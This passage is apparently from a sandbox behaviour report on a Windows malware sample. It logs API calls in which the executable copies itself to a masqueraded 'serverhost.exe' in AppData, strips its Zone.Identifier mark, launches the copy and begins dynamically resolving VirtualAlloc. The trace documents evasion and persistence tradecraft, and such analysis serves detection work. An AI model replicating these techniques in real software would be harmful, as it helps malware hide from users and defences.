LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74af0000 [0072.230] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x77040000 [0072.230] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x74180000 [0072.232] GetWindowsDirectoryW (in: lpBuffer=0x2ef5c8, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0072.232] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0xa7b27c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xa7b27c*=0x78b95e2e, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0072.232] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa7b9c8, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe")) returned 0x4d [0072.232] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x6) returned 0x0 [0072.238] lstrlenA (lpString="agent,app,audio,bio,bits,cache,card,cart,cert,com,crypt,dcom,defrag,device,dhcp,dns,event,evt,flt,gdi,group,help,home,host,info,iso,launch,log,logon,lookup,man,math,mgmt,msi,ncb,net,nv,nvidia,proc,prop,prov,provider,reg,rpc,screen,search,sec,server,service,shed,shedule,spec,srv,storage,svc,sys,system,task,time,video,view,win,window,wlan,wmi") returned 342 [0072.238] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xa7b5b8 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x0 [0072.240] _snwprintf (in: _Dest=0xa7b5b8, _Count=0x104, _Format="%s\\Microsoft\\Windows" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows") returned 56 [0072.240] _snwprintf (in: _Dest=0xa7b7c0, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 71 [0072.240] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0072.240] CreateFileMappingW (hFile=0x140, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x144 [0072.240] MapViewOfFile (hFileMappingObject=0x144, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xa80000 [0072.240] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17000 [0072.240] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0xa80000, Length=0x17000) returned 0x5a5d3f39 [0072.241] UnmapViewOfFile (lpBaseAddress=0xa80000) returned 1 [0072.242] CloseHandle (hObject=0x144) returned 1 [0072.242] CloseHandle (hObject=0x140) returned 1 [0072.242] GetComputerNameW (in: lpBuffer=0x2ef598, nSize=0x2ef5bc | out: lpBuffer="F71GWAT", nSize=0x2ef5bc) returned 1 [0072.242] _snprintf (in: _Dest=0xa7b2a8, _Count=0x104, _Format="%S_%08X" | out: _Dest="F71GWAT_78B95E2E") returned 16 [0072.242] _snwprintf (in: _Dest=0x2ef538, _Count=0x40, _Format="Global\\I%X" | out: _Dest="Global\\I78B95E2E") returned 16 [0072.242] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\I78B95E2E") returned 0x140 [0072.242] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x0) returned 0x0 [0072.243] _snwprintf (in: _Dest=0x2ef438, _Count=0x40, _Format="Global\\E%X" | out: _Dest="Global\\E78B95E2E") returned 16 [0072.243] _snwprintf (in: _Dest=0x2ef4b8, _Count=0x40, _Format="Global\\M%X" | out: _Dest="Global\\M78B95E2E") returned 16 [0072.243] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\M78B95E2E") returned 0x144 [0072.243] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="Global\\E78B95E2E") returned 0x148 [0072.243] SignalObjectAndWait (hObjectToSignal=0x148, hObjectToWaitOn=0x144, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x80 [0072.266] ResetEvent (hEvent=0x148) returned 1 [0072.266] ReleaseMutex (hMutex=0x140) returned 1 [0072.266] CloseHandle (hObject=0x140) returned 1 [0072.267] GetTickCount () returned 0x19a0d [0072.267] CreateTimerQueueTimer (in: phNewTimer=0x2ef5b8, TimerQueue=0x0, Callback=0xa7835b, Parameter=0x0, DueTime=0x3e8, Period=0x3e8, Flags=0x10 | out: phNewTimer=0x2ef5b8*=0x6ecf0) returned 1 [0072.267] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0074.365] DeleteTimerQueueTimer (TimerQueue=0x0, Timer=0x6ecf0, CompletionEvent=0xffffffff) returned 1 [0074.366] CloseHandle (hObject=0x148) returned 1 [0074.366] CryptDestroyHash (hHash=0x0) returned 0 [0074.367] CryptDestroyKey (hKey=0x0) returned 0 [0074.367] CryptDestroyKey (hKey=0x0) returned 0 [0074.367] CryptReleaseContext (hProv=0x0, dwFlags=0x0) returned 0 [0074.367] ExitProcess (uExitCode=0x0) Thread: id = 68 os_tid = 0xbf4 Thread: id = 69 os_tid = 0xbf8 [0073.265] GetTickCount () returned 0x19e03 [0074.264] GetTickCount () returned 0x1a1e9 [0074.264] lstrcmpiW (lpString1="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", lpString2="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned -1 [0074.264] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x10016 [0074.264] GetFileAttributesW (lpFileName="C:\\Users\\" (normalized: "c:\\users")) returned 0x11 [0074.265] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\" (normalized: "c:\\users\\bgc6u8oy yxgxkr")) returned 0x10 [0074.265] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata")) returned 0x2012 [0074.265] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local")) returned 0x2010 [0074.265] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft")) returned 0x2010 [0074.265] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows")) returned 0x2010 [0074.265] SHFileOperationW (in: lpFileOp=0x1e8fbbc*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", pTo="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0) | out: lpFileOp=0x1e8fbbc*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", pTo="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0)) returned 0 [0074.361] _snwprintf (in: _Dest=0x1e8f74c, _Count=0x104, _Format="%s:Zone.Identifier" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe:Zone.Identifier") returned 87 [0074.361] DeleteFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe:Zone.Identifier" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe:zone.identifier")) returned 0 [0074.361] CreateProcessW (in: lpApplicationName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1e8fb74*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1e8fbc8 | out: lpCommandLine=0x0, lpProcessInformation=0x1e8fbc8*(hProcess=0x164, hThread=0x16c, dwProcessId=0xc04, dwThreadId=0xc08)) returned 1 [0074.364] CloseHandle (hObject=0x164) returned 1 [0074.364] CloseHandle (hObject=0x16c) returned 1 [0074.364] SetEvent (hEvent=0x148) returned 1 Thread: id = 70 os_tid = 0xbfc Process: id = "10" image_name = "serverhost.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe" page_root = "0x7eef72e0" os_pid = "0xc04" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xbec" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1502 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1503 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1504 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1505 start_va = 0xc40000 end_va = 0xc5afff entry_point = 0xc40000 region_type = mapped_file name = "serverhost.exemh.exe" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exeMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exemh.exe") Region: id = 1506 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1507 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1508 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1509 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1510 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1511 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1512 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1513 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1514 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1515 start_va = 0x6eb50000 end_va = 0x6ebd3fff entry_point = 0x6eb519a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1516 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1517 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1518 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1519 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1520 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1521 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1522 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1523 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1524 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1525 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1526 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1527 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1528 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1529 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1530 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1531 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1532 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1533 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1534 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1535 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1536 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1537 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1538 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1539 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1540 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1541 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1542 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 1543 start_va = 0x5e0000 end_va = 0x9d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 1544 start_va = 0xc60000 end_va = 0x185ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 1545 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1546 start_va = 0x1860000 end_va = 0x1b2efff entry_point = 0x1860000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1547 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 1548 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1549 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x3e0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1550 start_va = 0x3f0000 end_va = 0x3f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1551 start_va = 0xb00000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 1552 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1553 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1554 start_va = 0x400000 end_va = 0x45bfff entry_point = 0x4235b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1555 start_va = 0x400000 end_va = 0x45bfff entry_point = 0x4235b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1556 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1557 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1558 start_va = 0x400000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1559 start_va = 0x9e0000 end_va = 0xabefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 1560 start_va = 0x1b80000 end_va = 0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 1561 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1562 start_va = 0x400000 end_va = 0x423fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1563 start_va = 0x470000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1564 start_va = 0x735e0000 end_va = 0x736dafff entry_point = 0x735f17e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1565 start_va = 0x430000 end_va = 0x430fff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1566 start_va = 0x440000 end_va = 0x448fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1567 start_va = 0x450000 end_va = 0x458fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1568 start_va = 0xac0000 end_va = 0xae3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 1569 start_va = 0x1c80000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 1570 start_va = 0x71510000 end_va = 0x7155bfff entry_point = 0x71512c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1571 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1572 start_va = 0x1b30000 end_va = 0x1b77fff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 1573 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1574 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1575 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1576 start_va = 0x400000 end_va = 0x411fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1577 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1578 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1579 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1580 start_va = 0x1d80000 end_va = 0x1dc7fff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1581 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1582 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1583 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1584 start_va = 0xac0000 end_va = 0xad1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 1585 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1586 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1587 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1588 start_va = 0x440000 end_va = 0x451fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1589 start_va = 0x420000 end_va = 0x42cfff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1590 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1591 start_va = 0x460000 end_va = 0x46cfff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Thread: id = 71 os_tid = 0xc08 [0074.440] GetConsoleCP () returned 0x0 [0074.440] GetMUILanguage () returned 0x0 [0074.440] ConvertFiberToThread () returned 0 [0074.440] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76890000 [0074.441] GetProcAddress (hModule=0x76890000, lpProcName="ReleaseCapture") returned 0x768c69f2 [0074.442] ReleaseCapture () returned 1 [0074.442] GetProcAddress (hModule=0x76890000, lpProcName="GetProcessWindowStation") returned 0x7689dfdc [0074.442] GetProcessWindowStation () returned 0x30 [0074.442] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x1cfa58, cbFileInfo=0x160, uFlags=0x4200 | out: psfi=0x1cfa58) returned 0x227d18 [0074.543] GetProcAddress (hModule=0x76890000, lpProcName="GetCaretBlinkTime") returned 0x768a0d01 [0074.543] GetCaretBlinkTime () returned 0x212 [0074.543] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x1cf74c | out: ProcedureAddress=0x1cf74c*=0x765e2fb6) returned 0x0 [0074.543] VirtualAlloc 